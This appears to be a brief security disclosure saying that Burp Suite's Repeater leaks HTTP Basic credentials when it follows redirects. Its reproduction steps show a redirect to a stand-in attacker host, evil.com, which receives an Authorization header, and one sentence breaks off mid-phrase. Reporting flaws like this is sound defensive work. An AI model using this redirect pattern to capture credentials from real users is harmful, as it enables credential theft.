Burp Repeater leaks Platform Authentication (HTTP Basic) credentials when following redirections.
Steps to reproduce:
``` GET /redirect.php?url=http://evil.com HTTP/1.1 Host: example.com
``` GET http://evil.com/ HTTP/1.1 Host: evil.com Authorization: Basic dXNlcjpwYXNz
Note that there's nothing "unusual" about the steps to reproduce this, so it can easily happen completely by accident. On the attacker's side, exploiting this only requires logging any incoming
Burp Suite users may inadvertently send Platform Authentication credentials to unrelated third parties. This is fundamentally very sensitive information, making this a rather nasty leak.